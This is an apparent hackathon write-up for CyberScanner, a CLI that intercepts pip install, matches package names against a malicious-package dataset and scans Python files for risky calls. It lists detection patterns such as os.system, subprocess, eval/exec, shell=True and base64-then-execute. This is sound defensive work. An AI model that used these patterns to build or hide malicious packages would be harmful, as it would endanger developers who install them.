CyberScanner

Inspiration

Open source supply chain attacks have surged in recent years. Malicious packages published to PyPI have stolen credentials, exfiltrated environment variables, and even established reverse shells on developer machines. The problem is simple: when you run pip install, you are placing blind trust in code that executes immediately. CyberScanner was built to introduce a security layer into that process without forcing developers to change how they already work.

What it does

CyberScanner intercepts pip install before anything executes locally and evaluates each package through two independent layers of protection.

The first layer checks the package name against the DataDog malicious-software-packages dataset, which contains over 1,800 confirmed PyPI threats. If a match is found, the package is blocked instantly without being downloaded.

The second layer downloads the package safely using pip download --no-deps, extracts the archive, and performs static analysis on every Python file. It scans for dangerous behavioral patterns such as os.system(), subprocess execution, eval() and exec(), use of shell=True, base64-encoded payloads, and high-risk combinations like base64 decoding followed by execution. These signals are combined into a weighted risk score that determines whether the install is allowed, flagged, or blocked.

How we built it

CyberScanner is implemented as a Node.js CLI using commander for argument parsing. The system uses pip download --no-deps to fetch packages without executing them. Extracted archives are handled with adm-zip for .whl files and the tar package for source distributions.

The behavioral scanner reads each Python file and applies regex-based pattern detection combined with a weighted scoring model. It also accounts for compound signals where multiple suspicious behaviors appear together. The DataDog dataset is fetched once and cached locally for 24 hours to ensure fast lookups.

To validate the system, we created a controlled test package called vulnpkg that simulates real malicious patterns safely. This allows us to verify detection accuracy end-to-end without introducing any risk.

Challenges we ran into

The biggest challenge was reducing false positives. Early versions relied on simple keyword matching, which incorrectly flagged legitimate packages like requests because they contained terms such as “subprocess” in harmless contexts.

We addressed this by refining detection to match specific call patterns, such as subprocess.call( instead of generic keyword presence. We also adjusted the scoring system so that individual weak signals do not trigger alerts. Only meaningful combinations of behaviors result in warnings or blocks.

Accomplishments that we're proud of

We achieved a zero false positive rate on widely used packages such as requests, numpy, flask, and django, while still detecting every malicious pattern in our controlled test package. The test package consistently scores well above the block threshold.

The two-layer pipeline also delivers strong performance. Known malicious packages are blocked instantly, and unknown packages are thoroughly analyzed before any code is executed.

What we learned

We found that static analysis of Python code from a Node.js environment is highly effective. Most real-world PyPI malware relies on consistent behavioral patterns, which can be detected without executing code.

We also learned how to properly interpret the DataDog dataset structure, including how it distinguishes between fully malicious packages and those compromised at specific versions. This required different handling strategies within our detection pipeline.

What's next for CyberScanner

We plan to expand CyberScanner beyond PyPI by adding support for npm and the broader Node.js ecosystem. We also want to enable full requirements.txt scanning so entire dependency sets can be evaluated before installation.

Future integrations include GitHub Actions for automated scanning on pull requests and a VS Code extension that surfaces risk warnings directly in the editor. We also plan to incorporate additional threat intelligence datasets to strengthen detection coverage.